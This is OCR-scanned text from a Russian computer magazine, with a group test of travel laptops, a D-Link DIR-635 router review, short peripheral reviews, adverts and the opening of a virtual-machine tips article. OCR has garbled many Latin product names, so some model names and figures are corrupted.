мый ноут действительно стоит требуемых за него денег. 

Неплохо справилось изделие от Оезіеп и с нашими тестами; завис он 
всего на одном из них. Дополнительно имеются встроенная ѵѵеЬ-ка- 
мера и СОМ-порт. За высокую степеньзащиты приходится платить, и в 
первую очередь габаритами и весом, да и цена устройства оправдывает 
себя, только если тебе действительно необходима машинка для жест 
кихусловий эксплуатации. Крометого, этот ноутбук оказался самым 
«прожорливым»участником теста в плане траты ресурса батареи. 



Технические характеристики: 

Процессор, ГГц: 1,8, ІпІеІСоге2 0иоТ7Ю0 
Память, Мб: 1024, модуль ІпІеІТигЬоМетогуі Гб 

Размер экрана, дюймы: 12 

Видеоплата, Мб: 320, ІпІеІбМАзіОО 

Жесткий диск, Гб: 120 

Оптический привод: ОѴОБирегМиКі 

Средства связи: модем, ѴѴі-Рі 

Интерфейсы: 115В, тіс,еаг, Ехргезз СагсІ, ѴСА, НШМІ-ои* 

Габариты, мм: 303x231x29,5 
Вес, кг: 1,8 

Этотлегкий и стильный девайс построен на платформе Іпіеі Сепігіпо 
йио и обладает массой дополнительных возможностей (например, здесь 
присутствует дактилоскопический сканер, позволяющий вместо ввода 
пароля просто приложить палец кспециальной панели, ителевизионный 
приемникстандарта ОТѴ). Также имеется 1 ,3-мегапиксельная ѵѵеЬ-каме- 
ра. Все это в сочетании со эффектным дизайном и высококачественным 
экраном позволиттебе в полной мере насладиться путешествием с такой 
машинкой. Достаточно неплохо показал себя девайс и в тестах, хотя в 
главном «мобильном»тесте — на расход батареи — занял второе место 
по «прожорливости». Видеоподсистема на основе Іпіеі ѲМА31 ООтакже 
продемонстрировала неплохую производительность, так что нетолько 
поработать, но и немного поиграть вполне можно. Отсутствует порт йѴІ, 
что может создать проблемы при подключении современных мониторов. 
Также в ноутбуке устновлен модульГазб-памяти ІпіеІТигЬоМетогу, уско- 
ряющий ускорость загрузки системы и приложений. 



ВаІІегуЕаІег 



О 20 40 60 80 100 120 140 
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Самым экономичным в плане расхода ресурса батареи оказался 
ВоѵегЬоок. Остальные «поедают» ресурс аккумулятора примерно оди- 
наково, лишь сверхзащищенный монстр от йезіеп делает это гораздо 
быстрее 



0 ѴѴІпВАП Іаріор 

1 ѴѴІпНАН 2004 аіѵѵауз ог 



А в этом тесте результаты оказались несколько неожиданными. Види 
это связано стем, что на скорость работы реальных (а нетестовых) 
ложений все-таки больше влияют не характеристики железа, а кол 
тво фоновых процессов, работа предустановленного софта, наст| 
системы и масса других параметров 



Зидимо, 
іх) при- 
юличес- 
-ройки 
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М5І МЕ6АВ00К РК 310 

•••••••ООО 



Технические характеристики: 

Процессор, ГГц: 1,6, АМ0ТигіопХ2ТІ_-52 

Память, Мб: 512 

Размер экрана, дюймы: 13,3 

Видеоплата, Мб: 128, АТІ ЕХРРЕ551150 

Жесткий диск, Гб: 80 

Оптический привод: ОѴОБирегМиКі 

Средства связи : модем, І_АІЧ, ѴѴі-Рі 

Интерфейсы: 115В, тіс,еаг, Ехргезз Сагсі, ѴСА, РігеѴѴіге 

Габариты, мм : 308,5x226,5x27-34 

Вес, КГ: 2 

Это компактный, стильный и, что немаловажно, доступный по цене 
ноутбук от М5І, который удобно взять с собой в дорогу. Экран отличается 
достаточно высоким качеством, так что ломать глаза тебе не придет- 
ся. Результаты тестирования, конечно, не самые выдающиеся, но, 
учитывая достаточно скромные характеристики и цену девайса, вполне 
достойные. Хотя глянцевое покрытие корпуса и придаетустройству до- 
полнительную изысканность, на нем хорошо видны отпечатки пальцев 
и будут заметны малейшие царапины, неизбежно появляющиеся при 
длительных разъездах. Порт йѴІ отсутствует. Очень слабая графическая 
система: один из тестов был завален, а во втором показана наименьшая 
производительность. 




Технические характеристики: 

Процессор, ГГц: 1,2, ІпІеІСоге йио Ш.ѴІІ2500 

Память, Мб: 1024 

Размер экрана, дюймы: 11,1 

Видеоплата, Мб: 256, ІпІеІСМА950 

Жесткий диск, Гб: 100 

Оптический привод: 0Ѵ0-РѴѴ0І_5ирегМииі 

Средства связи: модем, ЬАЫ, ѴѴі-Рі 

Интерфейсы: 115В, тіс,еаг, Ехргезз Сагсі, Ѵ6А, РігеѴѴіге 

Габариты, мм : 266x202,5x34,5 

Вес, кг: 1,56 

Очень легкая, компактная и достаточно мощная модель. Поставляется 
в двух конфигурациях: с процессором Іпіеі СогеОиоиІ_Ѵис Іпіеі Се [его п 
М ибѴ. В нашу тестовую лабораторию попал первый, более мощный 
вариант. Несмотря на небольшие габариты, клавиатура ноутбука 
полноразмерная (82 клавиши), а экран широкоформатный. Произво- 
дительность в целом неплохая. Порадовал нас и ресурс работы отакку- 
мулятора — более двух часов, притом что яркость экрана в этом режиме 
снижается лишь незначительно. Видеокарта установлена достаточно 
скромная: для работы ее хватит, а вот порезаться в новые игрушки вряд 
ли получится. Запихивание полноразмерной клавиатуры в сверхмалые 
габариты привело к тому, что сами клавиши оказались совсем уж ми- 
ниатюрными. Имеется всего два ІІЭВ-разъема, так что, возможно, тебе 
придется докупать ІІЭВ-хаб. 




[десь влияние графической системы не сказывается, и бюджетный 
451 МЕ6АВ00К РП200уверенно догоняетдвух абсолютных лидеров в 
іице 5опу и ТозЫЬа 




Проблемы совместимости ѴѴі псіоѵѵз Ѵізіа со старым софтом дали о себе 
знать:трое из семи участников несмогли пройти этоттест. Из прошедших 
тест победителем стал, как ни странно, Оезіеп СуЬегВоок5843 
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Представьте... форма, совершенная от природы 

Ни одной случайной линии и ни одной лишней детали. Естественно, ведь подход 
к дизайну был подсказан самой природой. Эргономичный, в тоже время такой 
элегантный корпус и самая современная ЖК-матрица. Идеально выверенное 
сочетание, нашедшее свое воплощение в новых мониторах Заглзипд. 



Мониторы 732ІМ / 932В / 932СѴѴ / 932ВР 






Единая служба поддержки: 8-800-555-55-55 (звонок по России бесплатный). 



Галерея 8ат$ипд: г. Москва, ул. Тверская, д. 9/17, стр. 1. ѵѵѵѵѵѵ.затзипд.ги. Товар сертифицирован. Реклама. 
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Технические характеристики: 

Процессор, ГГц: 1,8, Іпіеі Соге 2 Оио 

Память, Мб: 1024 

Размер экрана, дюймы: 13,3 

Видеоплата, Мб: 320 , ІпіеІѲМАХзюо 

Жесткий диск, Гб: 80 

Оптический привод: ОУйБирегМиШ 

Средства связи: модем, ѴѴі-Рі 

Интерфейсы: 115В, тіс,еаг, Ехргезз Сагсі, ѴСА 

Габариты, мм: 310 x 227 x 30 

Вес, кг: 1,4 

Дизайн этого устройства классический и, можно даже сказать, не- 
броский, но, взяв ноутбук в руки, понимаешь, что сделан он добротно. 
Дизайнеры ТозЫЬа пошли по правильному пути: вместо того чтобы 
шокировать покупателя гламурной отделкой и другими внешними 
изысками, они сделали весьма достойную машинку для реальной 
работы в полевыхусловиях. Неплохо дело обстоит и с начинкой: по ре- 
зультатам тестов ТозЫЬа 5а*еШ1:е 11300 лишь чуть-чуть уступает нашему 
рекордсмену ЗопуѴАІО Ѵ6Ы-СР1 15/ѴѴ, и это при куда меньшем весе и 
цене. Из дополнительных возможностей имеется встроенная ѵѵеЬ- ка- 
мера. Два изтрех портов 115В расположены вплотную друг к другу, и их 
одновременное использование затруднительно. Отсутствие порта йѴІ 
создает дополнительные проблемы при подключении многих совре- 
менных мониторов. 




Этот тест смогло пройти большее количество участников, и появилась 
возможность сравнить производительность видеосистемы бюджетных 
моделей. Из них лучшие результаты у М5І МЕ6АВ00К РР200. Ну а абсо- 
лютный рекордсмен, как всегда, 5опу 




5опу ѴАІ0Ѵ0Ы-СР115/ѴѴ 

•••••••••О 



Технические характеристики: 

Процессор, ГГц: 1,8 ГГц, ІпІеІСоге2 ОиоТ7іоо 

Память, Мб: 2048 
Размер экрана, дюймы: 14 
Видеоплата, Мб: 512 , ІпІеІѲМАХЗЮО 

Жесткий диск, Гб: 120 

Оптический привод: 0Ѵ0-РѴѴ0Ь5ирегМииі 
Средства связи : модем, І_АІЧ, ѴѴі-Рі, ВІиеІооІЬ 
Интерфейсы: 115В, тіс,еаг, Ехргезз Сагсі, ѴСА,5-Ѵіс1ео 
Габариты, мм : 335,1x42,5x249 

Вес, кг: 2,5 

Ослепительно-белый красавец отЭопу, как всегда, порадовал нас сво- 
им безупречным дизайном. Конечно, естественнее всего видетьтакой 
агрегат на столе начальника, хотя вес его и габариты не настолько 
запредельны, чтобы его нельзя было взять с собой в дорогу. Имеется 
встроенная 1 ,3- мега пиксельная ѵѵеЬ- камера. Произвела впечатление 
клавиатура, оченьудобная и вдобавок имеющая мягкий ход клавиш. 

В большинстве нашихтестов 5опу ѴАІО Ѵ6М-СР1 15/ѴѴ стал абсолютным 
победителем. Не в последнюю очередь на производительности сказы- 
вается графическая система на основе Іпіеі бгарЫсз Мебіа Ассеіегаіюг 
Х31 00. А вот время работы от аккумулятора оказалось стандартным — око- 
ло 1 ,5 часов. 

Далеко не каждый может себе позволить та ко го красавца — для многих 
его цена окажется заоблачной. Тачпад сделан не самым удобным образом. 
Великолепная отделка корпуса заставляет постоянно сдувать с него пы- 
линки и панически бояться царапин, которых не избежать в путешествии. 

ВЫВОДЫ 

Разумеется, однозначно плохих ноутбуков не бывает (иначе бы их никто не 
покупал), также каки безупречных во всех отношениях (тогда бы покупали 
только их). Для каждой конкретной цели в каждом конкретном случае по- 
дойдетопределенная модель. Сегодня мы протестировали семь ноутбуков, 
разработанных в расчете на использование их в регулярных поездках. 
Награду «Выбор редакции» мы отдаем 5опу ѴАІО ѴѲІМ-СР1 15/ѴѴ за хорошую 
производительность и прекрасный дизайн. Если же тебе страшновато всю- 
ду носить с собой девайс стоимостью более 2000 долларов или тебе просто 
нужна машинка покомпактнее, то хорошим решением будет М5І МЕ6АВ00К 
РР310. Ему мы отдаем награду «Лучшая покупка»: за сравнительно невысо- 
кую цену он предлагаетудобство, компактность и не самую плохую произво- 
дительность. Впрочем, и остальные модели не стоит сбрасывать со счетов. 
Например, еслитебе нужна машинка для экстремальных путешествий, то 
вспомни о Оезіеп СуЬегВоок5843, который выживеттам, где все другие сго- 
рят, разобьются ил и утонут. А если главное для тебя — конфиденциальность 
информации, то, возможно, ты обратишь внимание на М5І МЕ6АВ00К 
РР200 сего встроенным дактилоскопическим сканером. ~§г 



ТЕ5Т_І_АВ ВЫРАЖАЕТ БЛАГОДАРНОСТЬ ЗА ПРЕДОСТАВЛЕННОЕ НА ТЕСТИРОВАНИЕ ОБОРУДОВАНИЕ РОССИЙСКИМ ПРЕДСТА- 
ВИТЕЛЬСТВАМ КОМПАНИЙ 0Е5ТЕЫ, М5І, КОѴЕРВООК, БОНУ И Т05НІВА. 
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С 25 августа до 30 сентября яри покупке компьютера марки <МТ> на ба 
процессора ІпіеІ® Со™ 1 ™ 2 ОиасІ 066 00 в оптовых филиалах НТ К ом пьют 
и у наших дилеров м уг . . _ 



Подарок при покупке любого компьютера иа базе процессора Іпіе 
Адреса оптовых филиалов: 

Москва, тал: (446) Э6Э 93 9 3 ИтНр:ШгасЗе п Е. ги ^ 

Рбста в-на-Дону, тел ; (363) ЗЯБ 30 20 
Новосибирск, т*л; (363 і 344 99 04 ННр^ЁіЬ .пЬти ; 

Екатеринбург. тал: (043) 379 01 €3 ІіИріМпІ-игаІ.і'и 
Пермь, твг: |342) 237 15 73. 



ІпТттІ. логотип тіві. Іпіоі С ого и Сеге яал в ются тоаа рнь мн тна^омк »в территории США и други* стран 



сотриіег 



Испытай всю глубину виртуального мира с 
полноприводной машиной марки <ЫТ>! 
Следи залвтопробегом по стране на нашем са 



ііііібе 



Четыре ядра. 
Вне конкуренции, 
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ИГОРЬ ФЕДЮКИН 



ОВАЛЫ ИНТЕРНЕТ-ШЛЮЗ 

ото-иык 




ожно констатироватьтотфакт, что новейшие ѴѴІ-РІ устройс- 
тва перешли на новый этап развития. Причинтому как 
минимум две: выпускмобильной платформы ІпіеІЗапІа 
Роза с интегрированным ОгаК N адаптером, а также начало 
сертификационной программы ѴѴІ-РІ АШапсе устройств, разработанных по 
второй версии чернового стандарта ІЕЕЕ802.1 1 п. Таким образом, на рынке 
начинают появляться ноутбуки, изначально готовые к работе в сетях Ога^Ы, 
а сертификация ѴѴІ-РІ АШапсе, вероятнее всего, поможет решить проблемы 
совместимости оборудования разных производителей. Позволитли это 
«уже сейчас пользоваться технологиями завтрашнего дня», покажут время 
и наши тесты, а пока мы продолжаем исследовать регулярно выходящие 
новинки ѴѴІ-Рі роутеров. Ріа этот раз в нашей тестовой лаборатории побывал 
интернет-шлюз О-Ыпк РапдеВоозіег N650 (ОІР-635),такжеоснащенный 
встроенной ѴѴІ-РІ точкой доступа йгабі: N . 

ВНЕШНИЙ ВИД 

Дизайн шлюза отО-біпк продолжает удачную модельную линейку 
баппегЕоипде: стильный черный корпус с серебристой окантовкой, полоса 
светоиндикаторов зеленого цвета на черном фоне. Девайс выглядиточень 
стильно, и, надо сказать, О-Шпк постепенно перестаетассоциироваться с 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ 

Интерфейсы: ІхѴѴАЫ (РШ-45), 4х ШАЫ (РШ-45) 10/100 Мбит/сек 

Беспроводная точка доступа ѴѴІ-Рі: ІЕЕЕ802 .11 Ь/д + ОгаШЫ (до 
300 Мбит/сек) 

Безопасность: ѴѴЕР (до 128 бит), ѴѴРА/ѴѴРА-Р5К, ѴѴРА2/ѴѴРА2-Р5К 
(ТКІ Р/АЕ5/ТКІ Р+АЕ5) 

Функции роутера: ЫАТ/ЫАРТ, ОупОМЗ, □НСР,Тга!бс5Ьаріпд 
Функции файрвола: 5РІ, Раскеі Ріііег, ІІРЕРШег, МАО РШег, Ассевз 
Сопігоі 

Дополнительно: порт 115В 2.0 
ЦЕНА: $150 



однотипными серыми коробками. На лицевой панели находятся свето- 
диоды питания, состояния устройства, активности проводных сегментов 
ЕАЫ и ѴѴАЫ, а также беспроводной сети и загрузки ѴѴСЫ-профиля по 115В. 
Стыльной стороны располагаются 3 разъема для подключения антенн, 4 
порта бАИ, 115В- и ѴѴАЫ-порты, кнопка сброса на заводские настройки и 
разъем питания. Разъем 115В здесь может быть использован только для 
автоматической настройки ѴѴІ-РІ с помощью шаблонов ѴѴСЫ. О-Ыпк йі Р-635 
поставляется стремя антеннами с коэффициентом усиления 3 6ВІ у каждой. 

ФУНКЦИОНАЛЬНЫЕ ВОЗМОЖНОСТИ 

На ѴѴАЫ-интерфейсе шлюза доступно использованиеустановокЗШбс и 
Оупатіс протокола ІР, а также тун нелей РРРоЕ, РРТР и Е2ТР. В двух послед- 
них случаях ІР-адреса провайдерского шлюза и ѴРЫ-сервера задаются раз- 
дельно, что позволяет подключаться к РРТР/Е2ТР-серверудаже в случае его 
нахождения вне пользовательского сегмента. Не совсем понятно отсутствие 
такой полезной функции, как статическая маршрутизация. В случаеуста- 
новления связи по протоколам РРРоЕ/РРТР/Е2ТР шлюз забываето базовой 
сети, и таким образом мы лишаемся доступа к ресурсам внутренней сети. 
Присутствует возможность достаточно гибко задавать функцию трансляции 
портов (ЫАРТ).Заэти настройки здесь отвечаетдва раздела: ѴІНиа15егѵег и 
Рогі Еогѵѵагсііпд. Их суть идентична, разве что в первом случае нам предла- 
гается указать порты поштучно (один внешний — одному внутреннему), при- 
чем остается возможность транслироватьХвнешний портнаУ внутренний. 
Это может потребоваться, к примеру, если провайдер фильтрует некоторые 
стандартные номера портов (например, ЕТР:21 или НТТР:80). В настройках 
Рогі Еогѵѵагсііпд можно задавать целые диапазоны портов для трансляции, 
одна ко трансляции вида «X -> У» тут уже сделать не получится. Здесь имеет- 
ся большое количество пресетов для всевозможных игр и приложений, так 
что вполне возможно, настройка трансляции сведется к выбору названия 
игры и заданию внутреннего адреса компьютера. 

Как и в предыдущих моделях серии ѲатегЕоипде, здесь присутствует 
возможность классификации трафика. Можно возложить определение 
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приоритетного трафика на роутер в автоматическом режиме или задать 
правила по следующим критериям: протокол, ІР-адрес(а) источника, 
порт/диапазон портов источника, ІР-адрес(а) назначения, порт/диа- 
пазон портов назначения. Настройки фильтрации трафика довольно 
стандартны. Доступно блокирование запросов с внутренних компьюте- 
ров по ІР или МАС-адресу, фильтрация обращений к определенным ІІРЦ 
атакжезапреттрафика извне по диапазону ІР. 

М ЕТОДИ КА ТЕСТИРОВАН ИЯ 

Для тестирования проводного и беспроводного сегментов использовал- 
ся программный продукт ЫеШ СЬагіоі и скриптТЬгоидбрЫ с передачей 
пакетов максимального и минимального размера. На двух станциях 
уста на вливались та к называемые епброіпі- программы, затем в консоли 
ЫеІІ 0 Оба гіоі запускался скрипт генерации трафика. 

1. При тестировании пропускной способности ѴѴАЫ -> І_АЫ одна из 
станций подключалась кодному из портов свитча (интерфейс І_АІ\І), 
вторая — к ѴѴАЫ-порту. Таким образом, мы получали пиковую пропускную 
способность для ѴѴАЫ-интерфейса (также ее можно называть скоростью 
N АТ) . Измерялась скорость однонаправленной передачи (направления 
ѴѴАЫ -> І_АІ\І и І_АІ\І -> ѴѴАЫ) и в режиме полного дуплекса (РОХ). 

2 . Поскольку при активации интернет-соединения по протоколу РРТР 
создается дополнительная нагрузка на центральный процессор роутера, 
мы также измерили пропускную способность РРТР. Для этого за ѴѴАЫ- 
интерфейсом маршрутизатора был поднятѴРЫ-сервер. Также прове- 
рялась возможностьустановки ѴРЫ-соединения в случае размещения 
ѴРЫ-сервера вне сегмента нахождения нашего маршрутизатора. 

3. Для оценки скорости ѴѴі-Рі мы использовали 115В адаптер О-Ыпк 
йѴѴА-142. Измерения проводились втипичной квартире изтрехточек, 
находящихся на разном удалении от роутера. В первом случаеудаление 
не превышало одного метра и, какследует, измерялась максимальная 
скорость передачи данных. Во втором случае ноутбуке ѴѴІ-РІ адапте- 
ром находился на расстоянии 10 метров отточки доступа по диагонали 
за стеной. В третьем случаеудаление отточки доступа составляло 20 
метров. При этом она располагалась за двумя стенками, одна из которых 
была капитальной. Во всех случаях использовалась шифрация трафика 
ѴѴРА-Р5К с ключом ТКІР. 

4 . В качестве дополнительного исследования была проведена проверка 
на уязвимости со стороны ѴѴАЫ-интерфейса с помощью программного 
продукта ТепаЫе Меввив. Сканирование проводилось в двух режимах: с 
включенным и выключенным файрволом. 

РЕЗУЛЬТАТЫ ТЕСТОВ 

Использование достаточно мощного процессора позволяет роутеру 
практически без скоростных потерь обрабатывать 1 00-мегабитный 
потокданных. Пропускная способность І\ІАТ в направлении ѴѴАЫ -> І_АІ\І 
составляет 88,8 Мбит/сек, в обратном — 88,9 Мбит/сек, при передаче в 
обе стороны одновременно — 1 1 5,6 Мбит/сек. 

Пропускная способность РРТР-туннеля сравнительно высока. В направ- 
лении І_АІ\І -> ѴѴАЫ она составляет56,1 Мбит/сек, ѴѴАІХІ -> І_АЫ — 54,4 
Мбит/сек, при полном дуплексе — 60,7 Мбит/сек. 

Скоростные показатели ѴѴі-Рі достаточно скромны для Ога 0: N роутера. 

На минимальном расстоянии при одновременной передаче междуточ- 
кой доступа и ІІ5В-адаптером (РйХ) скорость составляет37,92 Мбит/сек. 
При передачетолько сточки доступа (АР-РС) —39,55 Мбит/сек, только с 
ІІ5В-карты (РС-АР) — 35,66 Мбит/сек. При удалении на 
1 0 метров скорость немного снижается. В режиме РОХ мы имеем 
35,63 Мбит/сек, АР-РС - 35,27 Мбит/сек, РС-АР - 34,43 Мбит/сек. На 
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Скорость ѴѴІ-РІ на минимальном расстоянии при передаче пакетов мини- 
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На графике представлена пропускная способность в двух режимах: с 
использованием протокола РРТР и в режиме Зіабс ІР (ЫАТ Опіу) 
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жорость ѴѴІ-РІ на минимальном расстоянии при передаче пакетов 
іаксимального размера 



максимальном расстоянии скорость снижается более заметно, однако 
прием остается достаточно уверенным. При двухсторонней передаче 
(РйХ) получаем 23,44 Мбит/сек, АР-РС - 25,4 Мбит/сек, РС-АР - 23,1 9 
Мбит/сек. 

Ради эксперимента мы также попробовали протестировать йі Р-635 
совместно с РСМСІА-адаптером А51І5 ѴѴІ_-1 60ѴѴ и ІІ5В-адаптером А51І5 
ѴѴІ_-1 00ѴѴ (оба также построены на йга^ N чипах). Результаты оказа- 
лись примерно натомже уровне, что и при использовании «родного» 
адаптера. 

Сканирование в ТепаЫе Мевзив не выявило у роутера ни одной уязви- 
мости, что говорито его достаточно хорошей защищенности. 

ВЫВОДЫ 

По сути, й- Ыі п к й I Р-635 — это промежуточное решение между Ога^і 1 .0 
роутером й-Ыпк О I Р-625 и йга^ 2.0 линейкой Хігете N. Маршрутизатор 
показал довольно высокую производительность интернет-соединения 
какв режиме ЫАТ.таки при использовании туннеля РРТР. Встроенная 
точка доступа ѴѴІ-РІ демонстрирует неплохие, но не рекордные показа- 
тели и, как показала практика, совместима в режиме ОгаИ: N с некото- 
рыми адаптерами сторонних производителей. Из недостатков продукта 
можно отметить отсутствие функции статической маршрутизации и 
сравнительно высокую цену. Итак, мы продолжаем следить за гонкой 
беспроводныхтехнологий, и на подходе новейшие модели йга^ 2.0 N 
ѴѴі-Рі роутеров. Оставайся на связи! ~іг 



ТЕ5Т_І_АВ ВЫРАЖАЕТ БЛАГОДАРНОСТЬ ЗА ПРЕДОСТАВЛЕННОЕ НА ТЕСТИРОВАНИЕ ОБОРУДОВАНИЕ РОССИЙСКОМУ 
ПРЕДСТАВИТЕЛЬСТВУ КОМПАНИИ О-ЬІЫК. 
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4 девайса 




Кіітіх КН-121 

«Капельки» 
глубокой посадки 
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Технические характеристики: 

Тип : вкладыши с закрытым типом оформления 

Диаметр мембраны: 13,5 мм 
Импеданс: 160м 
Чувствительность: 114 дБ 
Частотная характеристика: 10-20000 Гц 
Штепсель: 3,5 мм, позолоченный 
Кабель,- 1,2 м 



Технические характеристики: 

Емкость: 2,4 Гб 

Воспроизведение файлов: МРЗ/ѴѴМА/А5Р/066 

Воспроизведение видео- и фотофайлов: АМѴ, ѴѴМѴ, 0іѵХ(МРЕб4), ^6, 
ВМР 

Экран: 2-дюймовый 160x128 ЖК(2бо тысяч цветов) 

Дополнительно: поддержка форматов МРЕ64, йАТ, А5Р, ѴѴМѴ через 
транскодер 




1. Достаточно удобная конструкция позволяет без труда комфортно 
разместить наушники вушной раковине. 

2 . Глубокая посадка обеспечиваетхорошую звукоизоляцию, поэтому 
прослушивание даже в шумной обстановке можно осуществлять на 
небольшой громкости. 

3. Запас по подводимой мощности велик, что позволяет использовать 
наушники нетолько с портативными плеерами, но и с другой 
аудиотехникой. 

4 . Наибольший акцент в звучании делается на верхний диапазон низких 
частот. Это добавляетдинамичности звуку в играх и фильмах со 
спецэффектами. 

5 . В наличии имеются модели четырех разных цветов: белые, синие, 
красные и черные. 

6 . Достаточно низкая цена позволяет рассматривать эти наушники как 
бюджетный вариант для тех, кто не гонится за аудиофильским портатив- 
ным качеством звука. 

0 

1. При долгом прослушивании (более 2 часов) уши ощутим о уста ют, что, 
по правде говоря, является проблемой всех подобных вставных 
наушников. 

2 . Верхним частотам не хватает прозрачности и воздушности. Музыка в 
этих наушникахзвучит довольно скованно, а прослушивание оставляет 
двоякое впечатление. 




1. Стильный плеер. Он ориентирован на людей, ведущих активный образ 
жизни. 

2 . Чтобы во время твоих утренних пробежек случайно не переключались 
песни, имеется блокировка кнопок. 

3. Объем встроенной памяти варьируется от2 до4 Гб, чего вполнедоста- 
точнодля размещения неплохой коллекции музыки. 

4 . Встроенный ГМ-приемникобладаетхорошей чувствительностью. 

5 . Плеер поддерживает воспроизведение видео и фотографий, но перед 
закачкой видео необходимо пережать. 

6 . В поставку входят добротные наушники. Учитывая достаточную 
громкость плеера, можно рассчитывать на возможность прослушивания 
музыки даже в метро. 

0 

1. Нестандартный разъем для подключения кабеля может обернуться 
проблемой при случайной потере провода, идущего в комплекте. 

2 . При просмотре видео на маленьком экране быстроустают глаза. 
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ОкІісквбОМ 

Беспроводный комплект 
с зарядкой 




І.аЫес ІДІга-НаІ 
ѵѵігеіезз сіекзіор 

Сверхтонкий беспроводной комплект 




Технические характеристики: 

Подключение к ПК: 115В или Р5/2 
Интерфейс: 27 МГц 

Дополнительно: подставка для запястий, быстрые клавиши, регулятор 
громкости, колесо прокрутки 

Зарядное устройство: есть, одновременно подставка для мыши 




1. Этот беспроводный комплект выкрашен в серебряный и черный цвета, 
что является беспроигрышным сочетанием для стильных девайсов. 

2. Учитывая обтекаемые формы корпусов клавиатуры и мыши, атакже их 
тонкость, можно утверждать, что никакой интерьер они не испортят. 

3. Во многом это достигается и благодаря отсутствию проводов. Беспро- 
водной радиоинтерфейс 27 МГцхорошо справляется со своей работой. 

4. База служит одновременно и передатчиком, и зарядкой для мыши. 
Связь с ПК осуществляется с помощью интерфейса 115В или Р5/2. 

5. Клавиатура имеет стандартную раскладку, вращающийся регулятор 
громкости и дополнительное колесико прокрутки. 

6 . Множество дополнительных клавиш сгруппировано по функциональ- 
ной принадлежности. 

7. Также на клавиатуре находится индикатор заряда батарей. Оченьудоб- 
но, клавиатура не перестанет работать в самый неожиданный момент. 

8 . Есть подставка для запястий, которая спасеттвои руки оттуннельного 
синдрома. 

9. Мышь удобно л ежит в руке, имеет две кнопки, пару дополнительных 
клавиш и колесико прокрутки. 

0 

1. К недостаткам следует отнести слишком трескучие клавиши. Возмож- 
но, людей, которые много печатают, это будет раздражать. 



Технические характеристики: 

Язык: русский/английский 
Цвет: черно-серебристый 

Интерфейс: Р5/2 
Клавиши: 104 штуки 
Мультимедийные кнопки: 14 штук 
Размеры клавиатуры: 440x170x17 мм 
Размеры мыши: 112x65x30 мм 
Мышь: 800 СІрІ 

Поддержка ОС: ѴѴіпс1оѵѵ5 2000/Ме/ХР 




1. Весь комплектимееточеньстильный дизайн. Он прекрасно подойдет 
для использования в офисе. 

2. Клавиатура компактна. Это позволит сэкономить место на рабочем 
столе. 

3. Звук клика приглушен, но при этом кликхорошо ощущается. 

4. Мультимейдийные клавиши расположены удачно: если случайно заде- 
нешь, большого вреда это не причинит. 

5. Мышка удобно лежит в руке. Колесико прорезинено и не прокручивает 
лишние обороты. 

6 . Батареек в клавиатуре хватает на 3-4 месяца. Тебе не придется бегать 
за ними каждую неделю. Однако лучше всегда иметь комплект про запас. 

7. Максимальный радиус использования комплекта — 3-4 метра. Про- 
щайте, вечно путающиеся провода. 

0 

1. Нет подставки под запястье. 

2. Батарейки в мышке быстро садятся. 

3. Мышку можно использовать только на ковриках и матовых 
поверхностях. 

4. Кнопка йеіеіе маловата, можно случайно промахнуться. 

5. Отклик клавиатуры иногда запаздывает. Обычно это связано с появле- 
нием внешних помех, например, от сотового телефона. 



ТЕ5Т_І_АВ ВЫРАЖАЕТ БЛАГОДАРНОСТЬ ЗА ПРЕДОСТАВЛЕННОЕ НА ТЕСТИРОВАНИЕ ОБОРУДОВАНИЕ КОМПАНИИ МЕРНОЙ 
(ТД495) 739-0959, УтУУ.МЕКиОЫ.КЦ ). А ТАКЖЕ РОССИЙСКИМ ПРЕДСТАВИТЕЛЬСТВАМ КОМПАНИЙ КІТМІХ, ОІЖО И ІАВТЕС. 
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ПРИЕМОВ, КОТОРЫЕ ПРИГОДЯТСЯ ТЕБЕ В 
ПОГОНЕ ЗА ВИРТУАЛИЗАЦИЕЙ. 



ТКІСК #2. ѴМХ-ФАЙЛЫ 

Мы все привыкли, что новую виртуальной машину мы всегда создаем с 
помощью удобного мастера-конфигуратора, а все ее параметры в ходе 



Тір’пЧгіскз по виртуальным машинам 

О ТОМ, ЧТО ТАКОЕ ВИРТУАЛЬНАЯ МА- 
ШИНА, ЗНАЕТ ПРАКТИЧЕСКИ КАЖДЫЙ. 
ПОЧТИ ВСЕПРОБОВАЛИ ЕЕВДЕЙСТВИИ. 
ПОЛОВИНА ИСПОЛЬЗУЕТ ЕЕ КАЖДЫЙ 
ДЕНЬ. НО ОЧЕНЬ МАЛО ЛЮДЕЙ ЗНАЮТ 
ОБО ВСЕХТОНКОСТЯХ И ВОЗМОЖНОСТЯХ 
СОВРЕМЕННЫХ ПРОДУКТОВ ВИРТУАЛИ- 
ЗАЦИИ, ПОТОМУ КАК ВИРТУАЛИЗАЦИЯ 
-ЭТО НЕПРОСТО ОДНАТОЛЬКО ѴМѴѴАРЕ, 
ЭТО МАССА ПРОДУКТОВ, КАЖДЫЙ ИЗ КО- 
ТОРЫХ ИМЕЕТ СВОЕ ПРЕДНАЗНАЧЕНИЕ 
И ОСОБЕННОСТИ. ПРЕДЛАГАЮ ВНЕСТИ 
ЯСНОСТЬ И РАЗОБРАТЬ ПАРУ ПОЛЕЗНЫХ 



ТКІСК #1 . РЕАЛЬНАЯ СИСТЕМА ПОД ВИРТУАЛКОЙ 

Поставить гостевую ОС под виртуальной машиной в принципе не проблема. 
Но настраивать все заново, инсталлировать софт, обустраивать все под 
себя — это кропотливая работа и трата времени. Во многих случаях можно 
поступить проще и перенести свою реальную систему на виртуальную 
платформу. Для этого существуюттак называемые средства миграции с 
физических серверов на виртуальные (Р 2 Ѵ— РЬузісаІІю ѴігШаІ]. Компания 
ѴМѵѵаге предлагает использовать для этих целей продукт ѴМѵѵаге Сопѵегіег 
[ ѵѵѵѵѵѵ.ѵппѵѵа ге.сот і. однако ты можешь воспользоваться и решениями 
других производителей. На сайте доступна триальная версия, которой, 
впрочем, реально пользоваться и безлицензии в режиме ЗіаНег Мобе, по 
крайней мере на первый порах. 

Процесс миграции осуществляется с помощью специального мастера, ко- 
торый задасттебе ряд вопросов обустановленной системе и параметрах ее 
виртуальной версии. Описывать в деталях эту процедуры не имеетсмысла, 
потому какздесь все предельно понятно. Единственный нюанс — это рас- 
положение файлов виртуальной машины. Можно использовать локальный 
каталог, но ѴМѵѵаге СопѵеНег начнет ругаться, если путь назначения будет 
принадлежать конвертируемой системе. Хорошая идея — указать здесь ка- 
кой-нибудь сетевой диск, хотя подойдет и просто дополнительный винчес- 
тер. В любом случае на выходе ты получишь несколько файлов виртуальной 
